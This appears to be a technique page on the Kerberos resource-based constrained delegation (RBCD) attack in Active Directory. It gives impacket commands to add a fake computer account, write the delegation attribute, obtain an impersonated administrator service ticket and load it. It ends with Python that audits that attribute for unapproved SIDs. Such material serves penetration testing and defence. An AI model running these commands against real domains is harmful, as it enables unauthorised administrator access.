RBCD (Resource-Based Constrained Delegation) Attack

Last modified: 2023-10-22

Active Directory Windows

The Kerberos RBCD attack targets a domain computer, or more precisely the service principals associated with that computer.


Reference: https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation

0. Prerequisites

To achieve this attack successfully, we need the following conditions:

  • A domain account that has permission to write to the target computer object (the msDS-AllowedToActOnBehalfOfOtherIdentity property of the domain object).
  • A domain account that has permission to create a new computer.
  • LDAP (389) and SAMR (445) or LDAPS (636) access to the DC.
  • Kerberos (88) access to the DC.

1. Create Fake Computer

impacket-addcomputer -computer-name 'fakecomputer$' -computer-pass 'password' -dc-ip <DC_IP> 'example.local/username:password'

2. Modify Delegation Rights

We can use rbcd.py to abuse the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target.

rbcd.py -f FAKECOMPUTER -t WEB -dc-ip <DC_IP> example\\username:password

rbcd.py 'example.local/fakecomputer$' -delegate-to 'fakecomputer$' -delegate-from user1 -action write -use-ldaps -k -no-pass

3. Get the Impersonated Service Ticket

An impersonated service ticket may allow high-level access to services on the target, such as CIFS (Common Internet File System), HTTPS, etc.

getST.py -spn cifs/example.local -impersonate admin -dc-ip <DC_IP> 'example.local/FAKECOMPUTER$:password'

After getting the service ticket, point KRB5CCNAME at the saved ccache file so that Kerberos-aware tools use it for authentication.

export KRB5CCNAME="$(pwd)/admin.ccache"
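
To audit for the change made in step 2, a defender can decode the msDS-AllowedToActOnBehalfOfOtherIdentity value of each computer object (a self-relative security descriptor) and flag any SID in it that is not on an approved list. The Python below is an added example, not code from the original page or the referenced tools; the function names, the approved-list approach, and the sample hosts and SID are assumptions constructed for illustration.

```python
import struct

def pack_sid(sid):
    """Encode 'S-1-5-21-...' as a binary SID (used only to build the sample)."""
    parts = sid.split("-")
    subs = [int(p) for p in parts[3:]]
    return (bytes([int(parts[1]), len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))

def parse_sid(buf, off):
    """Decode the binary SID starting at buf[off] into its string form."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from(f"<{count}I", buf, off + 8)
    return "-".join(["S", str(rev), str(authority), *map(str, subs)])

def allowed_sids(sd):
    """List the SIDs in ACCESS_ALLOWED ACEs of a self-relative security descriptor."""
    rev, _, control, _, _, _, dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x8000:           # SE_SELF_RELATIVE
        raise ValueError("not a self-relative security descriptor")
    if not control & 0x0004 or dacl == 0:          # SE_DACL_PRESENT
        return []
    ace_count = struct.unpack_from("<H", sd, dacl + 4)[0]
    sids, pos = [], dacl + 8                       # ACEs follow the 8-byte ACL header
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_size < 16 or pos + ace_size > len(sd):
            raise ValueError("malformed ACE")
        if ace_type == 0x00:                       # ACCESS_ALLOWED_ACE: mask, then SID
            sids.append(parse_sid(sd, pos + 8))
        pos += ace_size
    return sids

def unexpected_delegations(computers, approved):
    """Map each computer to the delegated SIDs that are not on the approved list."""
    found = {name: [s for s in allowed_sids(sd) if s not in approved]
             for name, sd in computers.items() if sd}
    return {name: sids for name, sids in found.items() if sids}

# Constructed sample: the attribute value on WEB$ after an unknown machine account
# (made-up SID, RID 1105) was written into it. Owner is BUILTIN\Administrators.
ROGUE = "S-1-5-21-1111111111-2222222222-3333333333-1105"
owner, rogue = pack_sid("S-1-5-32-544"), pack_sid(ROGUE)
ace = struct.pack("<BBHI", 0, 0, 8 + len(rogue), 0x000F01FF) + rogue
acl = struct.pack("<BBHHH", 4, 0, 8 + len(ace), 1, 0) + ace
SAMPLE_SD = struct.pack("<BBHIIII", 1, 0, 0x8004, 20, 0, 0, 20 + len(owner)) + owner + acl
SAMPLE = {"WEB$": SAMPLE_SD, "FILE01$": b""}   # FILE01$ has the attribute unset
```

In a real audit the raw attribute bytes would come from an LDAP query over computer objects; an empty result from `unexpected_delegations` means every delegation found is on the approved list.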